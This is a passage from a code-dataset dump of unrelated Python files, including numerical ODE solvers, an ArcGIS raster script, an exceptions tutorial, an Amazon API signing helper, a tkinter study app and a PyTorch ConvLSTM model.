https://leetcode.com/problems/split-array-largest-sum/discuss/89821/Python-solution-dp-and-binary-search","sub_path":"leetcode_python/410.Split_Array_Largest_Sum.py","file_name":"410.Split_Array_Largest_Sum.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"609790438","text":"import numpy as np;\nimport matplotlib.pyplot as plt;\nimport math;\nfrom scipy.optimize import fsolve;\nimport time\n#Setup functions to be used in script environment\nabs = lambda a : np.abs(a)\n\ndef orderOfDecade(decade,N,E):\n decade = int(decade)\n i = N.index(decade)\n j = 0;\n while N[j] < decade*10 : j += 1;\n return str(abs(round(math.log(E[j],10) - math.log(E[i],10),3)))\n\nf = lambda x : 1 / (1 + x) #Note is only a function of x\nsoln = lambda t: np.sqrt(4 + 2*t) - 1\nEmax = lambda x,t: np.max(abs(x - soln(t)))\nEend = lambda x,t: abs(x[-1] - soln(t[-1]))\n\n\n\ngp = lambda xn, delta : lambda xnplus1 : xn - xnplus1 + ( f(xn) + f(xnplus1) )*delta/2\ndef trapIter(xn,delta,guess=0):\n g = gp(xn,delta)\n return fsolve(g,guess)[0]\n\ndef TRAP(N):\n delta = 16/N\n t = np.arange(0,16+delta,delta)\n x = [1];\n while len(x) < len(t):\n x.append(trapIter(x[-1],delta,x[-1]))\n x = np.array(x);\n return (t,x,Emax(x,t),Eend(x,t));\n\n#RK Part\ndef RK4(N):\n delta = 16/N\n def __RK4(xn):\n z1 = f(xn)\n z2 = f(xn + z1*delta/2)\n z3 = f(xn + z2*delta/2)\n z4 = f(xn + z3*delta)\n return xn + (z1 + 2*z2 + 2*z3 + z4)*delta/6\n t = np.arange(0,16+delta,delta)\n x = [1];\n while len(x) < len(t):\n x.append(__RK4(x[-1]))\n x = np.array(x);\n return (t,x,Emax(x,t),Eend(x,t))\n\n\n\n\n\n\n\n\n#==================================================================================================\n#==================================================================================================\n\ndef plotRK4():\n N = [n*10**m for m in [2,3,4,5] for n in range(1,10)]\n N.append(1000000)\n Eendings = []\n Emaxes = []\n\n print(\"__RK4__\".center(40,'#'))\n try:\n tic = time.time()\n for n in N:\n (t,x,Emax,Eend) = RK4(n);\n print(\"n=\"+str(n)+\", time=\"+str(round(time.time() - tic,2)) + \"[s]\")\n Eendings.append(Eend)\n Emaxes.append(Emax)\n except KeyboardInterrupt as ki:\n minlen = min([len(Eendings),len(Emaxes)])\n N = N[0:minlen]\n Eendings = Eendings[0:minlen]\n Emaxes = Emaxes[0:minlen]\n\n plt.plot(N,Emaxes,label=\"Emax O=\"+orderOfDecade(10**2,N,Emaxes))\n plt.plot(N,Eendings,label=\"Eend O=\"+orderOfDecade(10**2,N,Eendings))\n plt.yscale('log')\n plt.xscale('log')\n plt.grid(True)\n plt.legend();\n plt.show()\n\ndef plotTRAP():\n N = [n*10**m for m in [2,3,4,5] for n in range(1,10)]\n N = [N[i] for i in range(len(N)) if i % 2 == 0]\n N.append(1000000)\n Eendings = []\n Emaxes = []\n\n print(\"__TRAP__\".center(40,'#'))\n\n try:\n tic = time.time()\n for n in N:\n (t,x,Emax,Eend) = TRAP(n);\n print(\"n=\"+str(n)+\", time=\"+str(round(time.time() - tic,2)) + \"[s]\")\n Eendings.append(Eend)\n Emaxes.append(Emax)\n except KeyboardInterrupt as ki:\n minlen = min([len(Eendings),len(Emaxes)])\n N = N[0:minlen]\n Eendings = Eendings[0:minlen]\n Emaxes = Emaxes[0:minlen]\n\n plt.plot(N,Emaxes,label=\"Emax O=\"+orderOfDecade(10**2,N,Emaxes))\n plt.plot(N,Eendings,label=\"Eend O=\"+orderOfDecade(10**2,N,Eendings))\n plt.yscale('log')\n plt.xscale('log')\n plt.grid(True)\n plt.legend();\n plt.show()\n\ndef plotMethod(method,everyOther=False):\n distribution = (1,2,4,6,8) if everyOther else (1,2,3,4,5,6,7,8,9)\n N = [n*10**m for m in [2,3,4,5] for n in distribution]\n N.append(1000000)\n\n Eendings = []\n Emaxes = []\n\n print(str(method).split(' ')[1].center(40,'#'))\n tics = [];\n try:\n tic = time.time()\n for n in N:\n (t,x,Emax,Eend) = method(n);\n print(\"n=\"+str(n)+\", time=\"+str(round(time.time() - tic,2)) + \"[s]\")\n tics.append(round(time.time() - tic,2))\n Eendings.append(Eend)\n Emaxes.append(Emax)\n except KeyboardInterrupt as ki:\n minlen = min([len(Eendings),len(Emaxes)])\n N = N[0:minlen]\n Eendings = Eendings[0:minlen]\n Emaxes = Emaxes[0:minlen]\n\n plt.plot(N,Emaxes,label=\"Emax O=\"+orderOfDecade(10**2,N,Emaxes))\n plt.plot(N,Eendings,label=\"Eend O=\"+orderOfDecade(10**2,N,Eendings))\n plt.yscale('log')\n plt.xscale('log')\n plt.grid(True)\n plt.legend();\n plt.show()\n\n plt.cla();\n plt.clf();\n plt.plot(N,tics,'r-',label=\"iteration time in seconds\")\n plt.title(\"Iteration Time VS. N\")\n plt.ylabel('[sec]')\n plt.xlabel('discretization size')\n plt.legend();\n plt.grid(True);\n plt.show();\n\n","sub_path":"Homework/SEM2/02/src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181287982","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 09 14:32:00 2015\n\n@author: jroth\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 15:57:25 2015\n\n@author: jroth\n\"\"\"\n\ndef rasterMul(ras1, ras2, outRas):\n import os\n import arcpy\n from arcpy import env\n \n env.workspace = os.path.split(outRas)[0]\n arcpy.CheckOutExtension('Spatial')\n \n out = arcpy.sa.Times(ras1, ras2)\n #null = arcpy.sa.IsNull(out) \n #new = arcpy.sa.Con(null > 0, 0, out)\n out.save(outRas) \n\n\ndef ras2ascii(ras, asci):\n import arcpy\n# print os.path.sep(ras)\n# env.workspace = \n arcpy.RasterToASCII_conversion(ras, asci)\n \n \ndef delRas(ras):\n import arcpy\n arcpy.Delete_management(ras) \n \n\n\nimport os\nimport arcpy\nfrom arcpy import env \narcpy.CheckOutExtension(\"Spatial\")\ninDir = 'P:\\\\282\\\\model\\\\domain_runs\\\\1980-2011\\\\spatial_input\\\\lu'\noutDir = 'P:\\\\282\\\\gis\\\\Reeves_extracted_inputs\\\\lmb_lu'\n\n\ninpts = \"P:\\\\282\\\\gis\\\\Reeves_extracted_inputs\\\\5kptsAEA.shp\"\n\nprjFile = \"P:\\\\282\\\\gis\\\\Reeves_extracted_inputs\\\\outline.prj\"\n\nenv.workspace = outDir\n\n# get rasters to mask\nfiles = os.listdir(inDir)\nfor fyle in files:\n if fyle.endswith(\".asc\"):\n newAscii = os.path.join(outDir, fyle.split('.')[0]+\".asc\") # out ascii\n arcpy.CheckOutExtension(\"Spatial\") # checkout extension\n env.workspace = inDir # set workspace\n ras1 = arcpy.Raster(os.path.join(inDir, fyle)) # this is the raster we are extracting from\n newPts = os.path.join(outDir,fyle.split(\".\")[0]+\".shp\") # this is the new pt coverage we make \n arcpy.sa.ExtractValuesToPoints(inpts, ras1, newPts,\"NONE\", \"VALUE_ONLY\") # execute extraction\n \n repoPts = os.path.join(outDir,fyle.split(\".\")[0]+\"_rep.shp\")\n arcpy.Project_management(newPts, repoPts, prjFile)\n arcpy.Delete_management(newPts) \n outRas = os.path.join(os.path.split(newAscii)[0],os.path.split(newAscii)[1].split(\".\")[0][0:12])\n arcpy.PointToRaster_conversion(repoPts, \"RASTERVALU\", outRas, \"MEAN\", \"\", 5000)\n arcpy.Delete_management(repoPts) \n outSetNull = arcpy.sa.SetNull(outRas, outRas, \"VALUE < 0\")\n outSetNull.save(os.path.join(outDir,\"nullTemp\"))\n x = outSetNull.catalogPath\n arcpy.Delete_management(outRas) \n ras2ascii(outSetNull, newAscii)\n arcpy.Delete_management(outSetNull) ","sub_path":"ArcGIS/extractByPoint.py","file_name":"extractByPoint.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"125206940","text":"# Анна и Лолита играют в города.\r\n# Через N ходов Анна и Лолита забывают названные ими города. Вы\r\n# берете на себя тяжелую ношу - вам необходимо запоминать города в игре.\r\n\r\n\r\n# Формат ввода: Сначала идет число N (натуральное число) -\r\n# количество названных городов в игре.\r\n# Затем идет 15 строк - названия городов (гарантируется,\r\n# что все города различны).\r\n# После чего идет еще одна строка - новый город. \r\n\r\n\r\n# Вывод: \"OK\" - если такого города еще не было названо.\r\n# \"TRY ANOTHER\" - в противном случае.\r\n\r\n# 3\r\n# Москва\r\n# Верхние Кеки\r\n# Уфа\r\n# Ростов OK\r\n\r\n\r\n\r\ncities = set()\r\nfor _ in range(int(input())):\r\n cities.add(input())\r\nif input() in cities:\r\n print(\"TRY ANOTHER\")\r\nelse:\r\n print(\"OK\")","sub_path":"Lec_4_11.11/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356652968","text":"'''\r\nThe last except clause may omit the exception name(s), to serve as a wildcard. \r\nUse this with extreme caution, since it is easy to mask a real programming error in this way! \r\nIt can also be used to print an error message and then re-raise the exception \r\n(allowing a caller to handle the exception as well):\r\n'''\r\n\r\nimport sys\r\n\r\ntry:\r\n f = open('abc.txt')\r\n s = f.readline()\r\n i = int(s.strip())\r\n # raise TypeError\r\nexcept OSError as err:\r\n print(\"Os error : {0}\".format(err))\r\nexcept ValueError:\r\n print(\"Could not convert data to an integer.\")\r\nexcept:\r\n print(\"Unexpected error:\", sys.exc_info())\r\n # raise\r\n\r\n'''\r\nThe try … except statement has an optional else clause, which, when present, must follow all\r\n except clauses. It is useful for code that must be executed if the try clause does not \r\n raise an exception. For example:\r\n'''\r\nfor arg in sys.argv[1:]:\r\n try:\r\n # raise ValueError\r\n # f = open(arg, 'r')\r\n f = open('abc.txt', 'r')\r\n except OSError:\r\n print('cannot open', arg)\r\n else:\r\n print(arg, 'has', len(f.readlines()), 'lines')\r\n f.close()\r\n\r\n'''\r\nWhen an exception occurs, it may have an associated value, also known as the exception’s argument.\r\nThe presence and type of the argument depend on the exception type. The variable is bound to an \r\nexception instance with the arguments stored in instance.args.\r\n'''\r\n\r\ntry:\r\n raise Exception('arg1', 'arg2')\r\nexcept Exception as exp:\r\n print(type(exp)) # the exception instance\r\n print(exp.args) # arguments stored in .args\r\n print(exp) # __str__ allows args to be printed directly\r\n # but may be overridden in exception subclasses\r\n x, y = exp.args # unpack arguments\r\n print('X: ', x, ' and Y:', y)\r\n\r\n'''\r\nException handlers don’t just handle exceptions if they occur immediately in the try clause, \r\nbut also if they occur inside functions that are called (even indirectly) in the try clause.\r\nFor example:\r\n'''\r\n\r\n\r\ndef this_fail():\r\n x = 1 / 0\r\n\r\n\r\ntry:\r\n this_fail()\r\nexcept ZeroDivisionError as err:\r\n print('Handling run-time error:', err)\r\n\r\n'''\r\nThe raise statement allows the programmer to force a specified exception to occur. \r\nFor example:\r\n'''\r\n\r\n# raise NameError('HiThere')\r\n# raise ValueError # shorthand for 'raise ValueError()'\r\n\r\n\r\n'''\r\nIf you need to determine whether an exception was raised but don’t intend to handle it, \r\na simpler form of the raise statement allows you to re-raise the exception:\r\n'''\r\ntry:\r\n raise NameError('HiThere')\r\nexcept NameError:\r\n print('An exception flew by!')\r\n #raise\r\n\r\n\r\n'''\r\nFinally:\r\n\r\nThe try statement has another optional clause which is intended to define clean-up actions that \r\nmust be executed under all circumstances. \r\n\r\nA finally clause is always executed before leaving the try statement, whether an exception has \r\noccurred or not.\r\n\r\nFor example:\r\n'''\r\n\r\ndef divide(x, y):\r\n try:\r\n result = x/y;\r\n except ZeroDivisionError:\r\n print('Division by zero!')\r\n else:\r\n print('Result is: ', result)\r\n finally:\r\n print(\"Executing finally clause.\")\r\n\r\ndivide(10, 3)\r\ndivide(2, 0)\r\ndivide('3','4')\r\n\r\n'''\r\nPredefined Clean-up Actions:\r\n\r\nThe problem with this code is that it leaves the file open for an indeterminate\r\namount of time after this part of the code has finished executing. \r\nfor line in open(\"myfile.txt\"):\r\n print(line, end=\"\")\r\n\r\n\r\nThe with statement allows objects like files to be used in a way that ensures they are always\r\ncleaned up promptly and correctly.\r\n\r\nwith open(\"myfile.txt\") as f:\r\n for line in f:\r\n print(line, end=\"\")\r\n'''\r\n\r\n","sub_path":"errors_exceptions/exception_error1.py","file_name":"exception_error1.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88760136","text":"from urllib.parse import quote, urlparse\nimport httplib2\nimport time\nimport hashlib, hmac\nimport base64\n\nclass Amazon:\n \n def __init__(self\n , cache_dir\n , secret_key\n , url\n , Version\n , AWSAccessKeyId\n , AssociateTag\n , Service\n , Operation\n , **default_req_params):\n self.__h = httplib2.Http(cache_dir) \n self.__secret_key = secret_key\n self.__amazon_url = url;\n self.__default_req_params = {'Version': Version\n , 'AWSAccessKeyId': AWSAccessKeyId\n , 'AssociateTag': AssociateTag\n , 'Service': Service\n , 'Operation': Operation}\n self.__default_req_params.update(default_req_params)\n\n def request(self, **req_params):\n return self.__h.request(self.get_request_url(**req_params))\n\n def get_request_url(self, **req_params):\n return self.__build_url(dict(self.__default_req_params, **req_params))\n\n def __build_url(self, req_params):\n req_params['Timestamp'] = time.strftime(\"%Y-%m-%dT%H:%M:%S.000Z\", time.gmtime())\n req_param_str = '&'.join((k + \"=\" + quote(req_params[k].encode('utf-8'),safe='~'))\n for k in sorted(req_params.keys()))\n uo = urlparse(self.__amazon_url)\n signature = quote(base64.b64encode(hmac.new(self.__secret_key.encode('ascii')\n , (\"GET\\n\" + uo.netloc + \"\\n\" + uo.path\n + \"\\n\" + req_param_str).encode('ascii')\n , hashlib.sha256).digest()))\n url = self.__amazon_url + \"?\" + req_param_str + \"&Signature=\" + signature \n return url\n\n","sub_path":"amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350363216","text":"import tkinter as tk\nimport os\nimport threading\n#import threading\n\n#big problem that I faced: I had a different file named threading.py that messed it all up\n\nrandom = tk.Tk() #random to emphasize that this can be anything\n\ndef colour_contrast():\n\trandom.configure(background=\"blue\")\n\t#btnNormal = tk.Button(random, text = \" Normal Mode \", command = colour_normal) #command = speechThread\n\t#btnNormal.configure(bg = \"red\")\n\t#btnNormal.grid(row = 8, column = 1, sticky = \"NESW\")\n\t#btnContrast.config(row = 8, column = 0, columnspan = 1, sticky = \"NESW\")\n\tbtnContrast.config(text=\"Normal Mode\", command = colour_normal)\n\t#textMYP.config(random, background=\"yellow\", height = 3, width = 20)\n\ttextCExp.config(state = \"disabled\")\n\ndef say_term():\n\tterm = var.get()\n\ttoSay = \"say \" + term\n\tos.system(toSay)\n\nrandom.configure(background=\"light blue\")\n\ndef colour_normal():\n\trandom.configure(background=\"light blue\")\n\tbtnContrast.config(text=\"Contrast Mode\", command = colour_contrast)\n\ndef speechThread():\n\tt = threading.Thread(target = speech)\n\tt.start()\n\ndef colour_blue():\n\trandom.configure(background=\"light blue\")\n\n\ndef speech():\n\tos.system(\"say Select an MYP term\")\n\ndef change(*args):\n\t#Since every definition starts with the name of the command term. \n\t#always followed by a :\n\t#Step 1: \n\t#store the var term in a temp variable called term\n\tterm = var.get() #Analyse\n\n\t#Loop through the list definitions and pull out all the character before the :\n\t#When I find the value matches term I will print to the Text box\n\t\n\n\tdefinitions = {\n\t\t\"Select\": \"\", #clears everything // make sure to add comma (this was a problem I fell into while developing the code)\n\t\t\"Analyse\": \"Definition for Analyse\",\n\t\t\"Apply\": \"Definition for Apply\",\n\t\t\"Annotate\": \"Definition for Annotate\",\n\n\n\t}\n\n\tclarExplanation = {\n\t\t\"Select\": \"\", #clears everything\n\t\t\"Analyse\": \"Explanation for Analyse\",\n\t\t\"Apply\": \"Explanation for Apply\",\n\t\t\"Annotate\": \"Explanation for Annotate\",\n\t}\n\n\tquestionlevel = {\n\t\t\"Select\": \"\",\n\t\t\"Analyse\": \"Level for Analyse\",\n\t\t\"Apply\": \"Level for Apply\",\n\t\t\"Annotate\": \"Level for Annotate\",\n\t}\n\t#reason why this is not ideal is because it would be hard to add several different terms when i fully develop the idea\n\ttextMYP.config(state = \"normal\") #allowing for the text box to be editable\n\ttextMYP.delete(\"1.0\",tk.END) #deletes everything in the box\n\ttextMYP.insert(\"1.0\",definitions.get(term)) #python3 dictionaries - Looks up term in definitions{}, then returns what's beside it\n\ttextMYP.config(state = \"disabled\") #makes the text box not-editable once again\n\n\n\ttextCExp.config(state = \"normal\")\n\ttextCExp.delete(\"1.0\",tk.END)\n\ttextCExp.insert(\"1.0\",clarExplanation.get(term))\n\ttextCExp.config(state = \"disabled\")\n\n\ttextQLevel.config(state = \"normal\")\n\ttextQLevel.delete(\"1.0\",tk.END)\n\ttextQLevel.insert(\"1.0\",questionlevel.get(term))\n\ttextQLevel.config(state = \"disabled\")\n\n\n\n\n\t#for i in range(0,len(definitions),1):\n\t#\tcolLoc = definitions[i].index(\":\")\n\t##\tif (cterm == term):\n\t#\t\ttextMYP.config(state = \"normal\")\n\t#\t\ttextMYP.delete(\"1.0\",tk.END)\n\t#\t\ttextMYP.insert(\"1.0\",definitions[i])\n\t#\t\ttextMYP.config(state = \"disabled\")\n\t\n#definitions = [\n#\t\"Analyse:\\ndefinition1\\n\",\n#\t\"Apply:\\ndefinition2\\n\",\n#\t\"Annotate:\\ndefinition3\\n\"\n\n#\n\n\n\n#_____________________________________________\n\nlabMYP = tk.Label(random, text = \"MYP Term:\", background=\"light blue\")\n\nlabMYP.grid(pady = (0,0), row = 0, column = 0, sticky = \"NESW\")\n\n#____________________________________________\n\n\n\n#_____________________________________________\n\nCOMMANDTERM = [\n\t\"Select\",\n\t\"Analyse\",\n\t\"Annotate\",\n\t\"Apply\"\n]\n\nvar = tk.StringVar() #Special variable that holds what is in the drop down\nvar.set(COMMANDTERM[0])\nvar.trace(\"w\", change)\n\ndropDown = tk.OptionMenu(random, var, COMMANDTERM[0],COMMANDTERM[1],COMMANDTERM[2],COMMANDTERM[3])\ndropDown.grid(row = 1, column = 0, columnspan = 2, sticky = \"NESW\", pady = 10)\n\n#_____________________________________________\n\nbtnContrast = tk.Button(random, text = \"Contrast Mode\", foreground = \"black\", background = \"light blue\", command = colour_contrast) #command = speechThread\nbtnContrast.configure(bg = \"red\")\nbtnContrast.grid(row = 11, column = 0, columnspan = 2, sticky = \"NESW\")\n\n\t#if colour_red == True:\n\t#\tbtnNormal = tk.Button(random, text = \"Normal Mode\", command = colour_normal) #command = speechThread\n\t#\tbtnNormal.configure(bg = \"red\")\n\t#\tbtnNormal.grid(row = 0, column = 0)\n\n#_____________________________________________\n\nbtnEnter = tk.Button(random, text = \"Speech\", command = speechThread, bg=\"khaki1\") #command = speechThread\nbtnEnter.grid(row = 0, column = 1)\n\n#_____________________________________________\n\n\nlabTerm = tk.Label(random, text = \"Term:\", background=\"light blue\")\n\nlabTerm.grid(row = 2, column = 0, columnspan = 2, pady = (0,10))\n\n#_________________________________________________\n\ntextTerm = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextTerm.config(state = \"disabled\")\n\ntextTerm.grid(row = 3, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#____________________________________________\n\n\n\n#_____________________________________________\n\nlabIB = tk.Label(random, text = \"IB Definition:\", background=\"light blue\")\n\nlabIB.grid(row = 4, column = 0, columnspan = 2, pady = (0,10))\n\n#_____________________________________________\n\nbtnSAY = tk.Button(random, text = \"Term\", command = say_term)\n\nbtnSAY.grid(row = 4, column = 1, pady = (0,10))\n\n#____________________________________________\n\ntextMYP = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextMYP.config(state = \"disabled\")\n\ntextMYP.grid(row = 6, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#___________________________________________\n\nlabCE = tk.Label(random, text = \"Clarified Explanation:\", background=\"light blue\")\n\nlabCE.grid(row = 7, column = 0, pady = (0,10))\n\n#_____________________________________________\ndef onclick():\n\t\tmsg = \"How we got our definition?\\n\"\n\n\t\tmsg1 = \"Students here at UCC were asked to... \"\n\n\t\tpopup = tk.Tk()\n\n\t\tpopup.wm_title(\"!\")\n\t\tlabel = tk.Label(popup, text = msg, font = (\"Arial\", 16), background = \"light blue\")\n\t\tlabel1 = tk.Label(popup, text = msg1, font = (\"Arial\", 12), background = \"light blue\")\n\t\tlabel.pack(side = \"top\", fill = \"x\")\n\t\tlabel1.pack(side = \"top\", fill = \"x\")\n\t\tB1 = tk.Button(popup, text = \"Back\", command = popup.destroy, background = \"light blue\")\n\t\tB1.pack()\n\t\tpopup.mainloop()\n\nbtnInfo = tk.Button(random, text = \"Info\", command = lambda: onclick())\n\nbtnInfo.grid(pady = (0,10), row = 7, column = 1, columnspan = 1, sticky = \"NESW\")\n\n\n\n\n#____________________________________________\n\ntextCExp = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextCExp.config(state = \"disabled\")\n\ntextCExp.grid(row = 8, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#____________________________________________\n\nlabLV = tk.Label(random, text = \"Level of Question seen in:\", background = \"light blue\")\n\nlabLV.grid(row = 9, column = 0, columnspan = 2, pady = (0,10))\n\n#____________________________________________\n\ntextQLevel = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextQLevel.config(state = \"disabled\")\n\ntextQLevel.grid(row = 10, column = 0, columnspan = 2, sticky = \"NESW\")\n\n#_____________________________________________\n\n#textSpace = tk.Text(random, background=\"light blue\", height = 3, width = 20)\n#textSpace.config(state = \"disabled\")\n\n#textSpace.grid(row = 9, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#______________________________________________\n\nrandom.mainloop()\n\n#Basic:\n#1: Contruct\n#2: Configure\n#3: Pack\n\n#btn.Enter = tk.Button(random, text = \"Search\")\n\n#btn.Enter.pack()\n\n#******* allows for people on the internet (using a JSON) to add an example of a question with the command term in it (also add this as a text box / output)\n#I'd like to add colour to the background of my ","sub_path":"stepsForTranslator/TERMMypcalculator.py","file_name":"TERMMypcalculator.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114482309","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as f\n\nclass ConvLSTMCell(nn.Module):\n def __init__(self, input_channels, hidden_channels, kernel_size):\n super(ConvLSTMCell, self).__init__()\n\n # assert hidden_channels % 2 == 0\n\n self.input_channels = input_channels\n self.hidden_channels = hidden_channels\n self.kernel_size = kernel_size\n self.num_features = 4\n\n self.padding = int((kernel_size - 1) / 2)\n\n self.Wxi = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Whi = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n self.Wxf = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Whf = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n self.Wxc = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Whc = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n self.Wxo = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Who = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n\n self.Wci = None\n self.Wcf = None\n self.Wco = None\n\n def forward(self, x, h, c):\n ci = torch.sigmoid(self.Wxi(x) + self.Whi(h) + c * self.Wci)\n cf = torch.sigmoid(self.Wxf(x) + self.Whf(h) + c * self.Wcf)\n cc = cf * c + ci * torch.relu(self.Wxc(x) + self.Whc(h))\n co = torch.sigmoid(self.Wxo(x) + self.Who(h) + cc * self.Wco)\n ch = co * torch.relu(cc)\n return ch, cc\n\n def init_hidden(self, batch_size, hidden, shape):\n\n if self.Wci is None:\n self.Wci = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()\n self.Wcf = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()\n self.Wco = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()\n else:\n assert shape[0] == self.Wci.size()[2], 'Input Height Mismatched!'\n assert shape[1] == self.Wci.size()[3], 'Input Width Mismatched!'\n\n return (Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda(),\n Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda())\n\n\nclass ConvLSTM(nn.Module):\n def __init__(self, input_channels, hidden_channels, kernel_size, frame_size, n_filters, hidden_size, device, step=1): #, effective_step=[1]\n super(ConvLSTM, self).__init__()\n self.frame_size = frame_size\n self.hidden_size = hidden_size\n self.n_filters = n_filters\n self.device = device\n self.input_channels = [input_channels] + hidden_channels\n self.hidden_channels = hidden_channels\n self.kernel_size = kernel_size\n self.num_layers = len(hidden_channels)\n self.step = step\n\n self.cnn_before_lstm = nn.Sequential()\n self.cnn_before_lstm.add_module('conv0', nn.Conv2d(666, 256, 5, 1, 2))\n self.cnn_before_lstm.add_module('batchnorm0', nn.BatchNorm2d(256))\n self.cnn_before_lstm.add_module('relu0', nn.ReLU())\n self.cnn_before_lstm.add_module('conv1', nn.Conv2d(256, 128, 5, 1, 2))\n self.cnn_before_lstm.add_module('batchnorm1', nn.BatchNorm2d(128))\n\n self.cnn_after_lstm = nn.Sequential()\n self.cnn_after_lstm.add_module('conv2', nn.Conv2d(64, 32, 3, 1, 1))\n self.cnn_after_lstm.add_module('batchnorm2', nn.BatchNorm2d(32))\n self.cnn_after_lstm.add_module('relu2', nn.ReLU())\n self.cnn_after_lstm.add_module('conv3', nn.Conv2d(32, 1, 3, 1, 1))\n\n self.cnn_meas = nn.Sequential()\n self.cnn_meas.add_module('conv4', nn.Conv2d(1, 256, 3, 1, 1))\n self.cnn_meas.add_module('batchnorm4', nn.BatchNorm2d(256))\n self.cnn_meas.add_module('relu4', nn.ReLU())\n self.cnn_meas.add_module('conv5', nn.Conv2d(256, 666, 1, 1, 0))\n self.cnn_meas.add_module('batchnorm5', nn.BatchNorm2d(666, affine=False))\n\n for m in self.modules():\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.xavier_normal_(m.weight)\n nn.init.constant_(m.bias, 0.)\n\n self._all_layers = []\n name = 'cell0'\n cell = ConvLSTMCell(128, 64, 3)\n setattr(self, name, cell)\n self._all_layers.append(cell)\n self.gamma = nn.Parameter(torch.zeros(1))\n\n def forward(self, image, phi_0):\n internal_state = []\n batch_size, seq_len, width, height = image.size()\n output_seq = Variable(torch.zeros(batch_size, seq_len, width, height)).cuda()\n\n phi_t = f.normalize(phi_0, p=2, dim=1)\n for step in range(self.step):\n image_t = image[:, step, :]\n\n y_t = torch.sum(image_t[:, None, :, :] * phi_t, dim=(2, 3))\n x_1 = y_t[:, :, None, None] * phi_t\n x = self.cnn_before_lstm(x_1)\n\n for i in range(self.num_layers): ## If you use more than one layer\n # All cells are initialized in the first step\n name = 'cell{}'.format(i)\n if step == 0:\n bsize, _, height, width = x.size()\n (h, c) = getattr(self, name).init_hidden(batch_size=bsize, hidden=self.hidden_channels[i],\n shape=(height, width))\n internal_state.append((h, c))\n\n # Do forward\n (h, c) = internal_state[i]\n x, new_c = getattr(self, name)(x, h, c)\n internal_state[i] = (x, new_c)\n\n x_output = self.cnn_after_lstm(x)\n\n phi_t = torch.sign(phi_0 + self.gamma * self.cnn_meas(x_output))\n # phi_t = f.normalize(phi_t, p=2, dim=1)\n\n output_seq[:, step, :] = x_output.squeeze(1)\n\n return output_seq, (x, new_c)\n\n\n def smoothclamp(self, x, mi, mx):\n return mi + (mx-mi)*(lambda t: torch.where(t < 0 , torch.cuda.FloatTensor(t.size()).fill_(0), torch.where( t <= 1 , 3*t**2-2*t**3, torch.cuda.FloatTensor(t.size()).fill_(1))))((x-mi)/(mx-mi))\n\n\n def clampoid(self, x, mi, mx):\n return mi + (mx-mi)*(lambda t: 0.5*(1+200**(-t+0.5))**(-1) + 0.5*torch.where(t < 0 , torch.cuda.FloatTensor(t.size()).fill_(0), torch.where( t <= 1 , 3*t**2-2*t**3, torch.cuda.FloatTensor(t.size()).fill_(1) ) ) )( (x-mi)/(mx-mi) )\n\n","sub_path":"conv_LSTM_adaptive_128.py","file_name":"conv_LSTM_adaptive_128.py","file_ext":"py","file_size_in_byte":6659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"64849118","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# #\n# odoo, Open Source Management Solution #\n# ### PROOSOFT CLOUD ### #\n# --2018-- #\n# #\n##############################################################################\n\n\nimport re\nfrom odoo.tools.translate import _\n\nTRANS=[\n (u'é','e'),\n (u'è','e'),\n (u'à','a'),\n (u'ê','e'),\n (u'î','i'),\n (u'ï','i'),\n (u'â','a'),\n (u'ä','a'),\n]\n\nclass record:\n def __init__(self, global_context_dict):\n for i in global_context_dict:\n global_context_dict[i] = global_context_dict[i] \\\n and tr(global_context_dict[i])\n self.fields = []\n self.global_values = global_context_dict\n self.pre = {\n 'padding': '',\n 'seg_num1': '01',\n 'seg_num2': '02',\n 'seg_num3': '03',\n 